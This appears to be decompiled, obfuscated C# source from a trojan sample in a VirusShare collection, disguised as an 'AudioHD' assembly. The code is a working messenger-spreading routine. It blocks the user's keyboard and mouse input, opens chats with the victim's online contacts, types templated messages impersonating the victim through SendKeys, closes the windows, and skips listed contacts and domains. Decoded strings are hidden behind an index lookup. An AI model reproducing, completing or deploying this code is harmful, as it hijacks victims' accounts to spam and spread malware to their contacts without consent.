// Decompiled with JetBrains decompiler // Type: . // Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe using \u0003; using \u0006; using System; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Runtime.InteropServices; using System.Text.RegularExpressions; using System.Threading; using System.Windows.Forms; namespace \u000E { internal sealed class \u0006 { [NonSerialized] internal static \u0001.\u0002 \u0001; public static string[] \u0001; public static string[] \u0002; public static bool \u0001; public static string \u0001; [DllImport("user32.dll", EntryPoint = "BlockInput", CharSet = CharSet.Auto)] private static extern bool \u000F([MarshalAs(UnmanagedType.Bool), In] bool fBlockIt); [DllImport("user32.dll", EntryPoint = "PostMessage", SetLastError = true)] private static extern bool \u000F([In] IntPtr obj0, [In] uint obj1, [In] IntPtr obj2, [In] IntPtr obj3); [DllImport("user32.dll", EntryPoint = "FindWindowEx", SetLastError = true)] private static extern IntPtr \u000F([In] IntPtr obj0, [In] IntPtr obj1, [In] string obj2, [In] IntPtr obj3); [DllImport("user32.dll", EntryPoint = "ShowWindow")] private static extern bool \u000F([In] IntPtr obj0, [In] int obj1); [DllImport("user32.dll", EntryPoint = "FindWindow", SetLastError = true)] private static extern IntPtr \u000F([In] IntPtr obj0, [In] string obj1); public static void \u000F([In] string[] obj0, [In] string[] obj1) { if (\u000E.\u0006.\u0001) return; if (!\u000E.\u0006.\u000F()) return; try { \u000E.\u0006.\u0001 = obj0; \u000E.\u0006.\u0002 = obj1; // ISSUE: method pointer ((\u0004.\u0001) new \u0008()).add_OnContactStatusChange(new \u0005((object) null, (UIntPtr) __methodptr(\u000F))); \u000E.\u0006.\u0001 = true; } catch { } } private static void \u000F([In] object obj0, [In] \u0002.\u0007 obj1) { \u0003.\u0006 vContact = (\u0003.\u0006) obj0; if (obj1 != \u0002.\u0007.\u0003 || vContact.IsSelf || \u000E.\u0006.\u000F(vContact.SigninName) || vContact.Blocked) return; if (\u000E.\u0006.\u0010(vContact.SigninName)) return; try { \u0007.\u0004 obj = (\u0007.\u0004) new \u0008(); string str1 = \u000E.\u0006.\u000F(vContact.FriendlyName); foreach (\u0003.\u0006 myContact in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts) { IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, \u000E.\u0006.\u000F(myContact.FriendlyName) + \u000E.\u0006.\u0001(4127) + myContact.SigninName + \u000E.\u0006.\u0001(1879)); try { \u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero); } catch { } } foreach (\u0003.\u0006 myContact in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts) { IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, myContact.FriendlyName + \u000E.\u0006.\u0001(4127) + myContact.SigninName + \u000E.\u0006.\u0001(1879)); try { \u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero); } catch { } } \u000E.\u0006.\u000F(true); Thread.Sleep(1000); ((\u0003.\u0004) obj).\u0002((object) vContact); IntPtr num1 = \u000E.\u0006.\u000F(IntPtr.Zero, vContact.FriendlyName + \u000E.\u0006.\u0001(4127) + vContact.SigninName + \u000E.\u0006.\u0001(1879)); if (num1.ToString() == \u000E.\u0006.\u0001(1939)) num1 = \u000E.\u0006.\u000F(IntPtr.Zero, str1 + \u000E.\u0006.\u0001(4127) + vContact.SigninName + \u000E.\u0006.\u0001(1879)); \u000E.\u0006.\u000F(num1, 0); \u000E.\u0006.\u000F(\u000E.\u0006.\u000F(num1, IntPtr.Zero, \u000E.\u0006.\u0001(4132), IntPtr.Zero), IntPtr.Zero, \u000E.\u0006.\u0001(4153), IntPtr.Zero); string str2 = \u000E.\u0006.\u0001[\u000E.\u0006.\u000F(0, \u000E.\u0006.\u0001.Length)]; string newValue = \u000E.\u0006.\u0002[\u000E.\u0006.\u000F(0, \u000E.\u0006.\u0002.Length)].Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), vContact.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), vContact.FriendlyName); SendKeys.SendWait(str2.Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), vContact.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), vContact.FriendlyName).Replace(\u000E.\u0006.\u0001(4222), newValue)); SendKeys.SendWait(\u000E.\u0006.\u0001(4231)); Process[] processes = Process.GetProcesses(); for (int index = 0; index < processes.Length; ++index) { try { if (processes[index].MainWindowTitle.Contains(vContact.SigninName)) processes[index].CloseMainWindow(); } catch { } } \u000E.\u0006.\u000F(false); } catch { \u000E.\u0006.\u000F(false); } } private static bool \u000F([In] string obj0) => new List() { \u000E.\u0006.\u0001(4244), \u000E.\u0006.\u0001(4277), \u000E.\u0006.\u0001(4306), \u000E.\u0006.\u0001(4339), \u000E.\u0006.\u0001(4368), \u000E.\u0006.\u0001(4397), \u000E.\u0006.\u0001(4426), \u000E.\u0006.\u0001(4451), \u000E.\u0006.\u0001(4484), \u000E.\u0006.\u0001(4517), \u000E.\u0006.\u0001(4554), \u000E.\u0006.\u0001(4595), \u000E.\u0006.\u0001(4620), \u000E.\u0006.\u0001(4653), \u000E.\u0006.\u0001(4686), \u000E.\u0006.\u0001(4731), \u000E.\u0006.\u0001(4768), \u000E.\u0006.\u0001(4801), \u000E.\u0006.\u0001(4838), \u000E.\u0006.\u0001(4867), \u000E.\u0006.\u0001(4900), \u000E.\u0006.\u0001(4929), \u000E.\u0006.\u0001(4958), \u000E.\u0006.\u0001(4995), \u000E.\u0006.\u0001(5032), \u000E.\u0006.\u0001(5065), \u000E.\u0006.\u0001(5094), \u000E.\u0006.\u0001(5135), \u000E.\u0006.\u0001(5168), \u000E.\u0006.\u0001(5032), \u000E.\u0006.\u0001(5201), \u000E.\u0006.\u0001(5242), \u000E.\u0006.\u0001(5283), \u000E.\u0006.\u0001(5316), \u000E.\u0006.\u0001(5337), \u000E.\u0006.\u0001(5358), \u000E.\u0006.\u0001(5383), \u000E.\u0006.\u0001(5420), \u000E.\u0006.\u0001(5453), \u000E.\u0006.\u0001(5478), \u000E.\u0006.\u0001(5507), \u000E.\u0006.\u0001(5544), \u000E.\u0006.\u0001(5573), \u000E.\u0006.\u0001(5606), \u000E.\u0006.\u0001(5639), \u000E.\u0006.\u0001(5680), \u000E.\u0006.\u0001(5705), \u000E.\u0006.\u0001(5742), \u000E.\u0006.\u0001(5775), \u000E.\u0006.\u0001(5420), \u000E.\u0006.\u0001(5804), \u000E.\u0006.\u0001(5837), \u000E.\u0006.\u0001(5862), \u000E.\u0006.\u0001(5891), \u000E.\u0006.\u0001(5928), \u000E.\u0006.\u0001(5961), \u000E.\u0006.\u0001(5994), \u000E.\u0006.\u0001(6027), \u000E.\u0006.\u0001(6072) }.Contains(obj0); private static bool \u0010([In] string obj0) { foreach (string str in new List() { \u000E.\u0006.\u0001(6117), \u000E.\u0006.\u0001(6126), \u000E.\u0006.\u0001(6135), \u000E.\u0006.\u0001(6156), \u000E.\u0006.\u0001(6177), \u000E.\u0006.\u0001(6198), \u000E.\u0006.\u0001(6219), \u000E.\u0006.\u0001(6244), \u000E.\u0006.\u0001(6265), \u000E.\u0006.\u0001(6286), \u000E.\u0006.\u0001(6307), \u000E.\u0006.\u0001(6328), \u000E.\u0006.\u0001(6345), \u000E.\u0006.\u0001(6362), \u000E.\u0006.\u0001(6379), \u000E.\u0006.\u0001(6396), \u000E.\u0006.\u0001(6244), \u000E.\u0006.\u0001(6265), \u000E.\u0006.\u0001(6286), \u000E.\u0006.\u0001(6328), \u000E.\u0006.\u0001(6345), \u000E.\u0006.\u0001(6345), \u000E.\u0006.\u0001(6362), \u000E.\u0006.\u0001(6417), \u000E.\u0006.\u0001(6434), \u000E.\u0006.\u0001(6459), \u000E.\u0006.\u0001(6476), \u000E.\u0006.\u0001(6521), \u000E.\u0006.\u0001(6550), \u000E.\u0006.\u0001(6571), \u000E.\u0006.\u0001(6596), \u000E.\u0006.\u0001(6621), \u000E.\u0006.\u0001(6646), \u000E.\u0006.\u0001(6667), \u000E.\u0006.\u0001(6680), \u000E.\u0006.\u0001(6689), \u000E.\u0006.\u0001(6706), \u000E.\u0006.\u0001(6727) }) { if (obj0.EndsWith(str)) return true; } return false; } private static string \u000F([In] string obj0) { string pattern = \u000E.\u0006.\u0001(6740); return Regex.Replace(obj0, pattern, string.Empty); } public static void \u000F([In] string[] obj0, [In] string[] obj1, [In] int obj2) { if (!\u000E.\u0006.\u000F()) return; try { \u0007.\u0004 obj = (\u0007.\u0004) new \u0008(); ((\u0003.\u0004) obj).MyStatus = \u0002.\u0007.\u0004; foreach (\u0003.\u0006 myContact1 in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts) { if (myContact1.Status != \u0002.\u0007.\u0002 && !myContact1.IsSelf && !\u000E.\u0006.\u000F(myContact1.SigninName) && !myContact1.Blocked) { if (!\u000E.\u0006.\u0010(myContact1.SigninName)) { try { string str1 = \u000E.\u0006.\u000F(myContact1.FriendlyName); foreach (\u0003.\u0006 myContact2 in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts) { IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, \u000E.\u0006.\u000F(myContact2.FriendlyName) + \u000E.\u0006.\u0001(4127) + myContact2.SigninName + \u000E.\u0006.\u0001(1879)); try { \u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero); } catch { } } foreach (\u0003.\u0006 myContact3 in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts) { IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, myContact3.FriendlyName + \u000E.\u0006.\u0001(4127) + myContact3.SigninName + \u000E.\u0006.\u0001(1879)); try { \u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero); } catch { } } \u000E.\u0006.\u000F(true); Thread.Sleep(1000); ((\u0003.\u0004) obj).\u0002((object) myContact1); IntPtr num1 = \u000E.\u0006.\u000F(IntPtr.Zero, myContact1.FriendlyName + \u000E.\u0006.\u0001(4127) + myContact1.SigninName + \u000E.\u0006.\u0001(1879)); if (num1.ToString() == \u000E.\u0006.\u0001(1939)) num1 = \u000E.\u0006.\u000F(IntPtr.Zero, str1 + \u000E.\u0006.\u0001(4127) + myContact1.SigninName + \u000E.\u0006.\u0001(1879)); \u000E.\u0006.\u000F(num1, 0); \u000E.\u0006.\u000F(\u000E.\u0006.\u000F(num1, IntPtr.Zero, \u000E.\u0006.\u0001(4132), IntPtr.Zero), IntPtr.Zero, \u000E.\u0006.\u0001(4153), IntPtr.Zero); string str2 = obj0[\u000E.\u0006.\u000F(0, obj0.Length)]; string newValue = obj1[\u000E.\u0006.\u000F(0, obj1.Length)].Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), myContact1.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), myContact1.FriendlyName); SendKeys.SendWait(str2.Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), myContact1.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), myContact1.FriendlyName).Replace(\u000E.\u0006.\u0001(4222), newValue)); SendKeys.SendWait(\u000E.\u0006.\u0001(4231)); Process[] processes = Process.GetProcesses(); for (int index = 0; index < processes.Length; ++index) { try { if (processes[index].MainWindowTitle.Contains(myContact1.SigninName)) processes[index].CloseMainWindow(); } catch { } } \u000E.\u0006.\u000F(false); Thread.Sleep(obj2); } catch { \u000E.\u0006.\u000F(false); } } } } ((\u0003.\u0004) obj).MyStatus = \u0002.\u0007.\u0003; } catch { \u000E.\u0006.\u000F(false); } \u000E.\u0006.\u000F(false); } private static int \u000F([In] int obj0, [In] int obj1) => new Random().Next(obj0, obj1); public static bool \u000F() => File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u000E.\u0006.\u0001(6753)); static \u0006() { \u0001.\u0003.\u000F(); \u000E.\u0006.\u0001 = (string[]) null; \u000E.\u0006.\u0002 = (string[]) null; \u000E.\u0006.\u0001 = false; \u000E.\u0006.\u0001 = \u000E.\u0006.\u0001(1001); } } }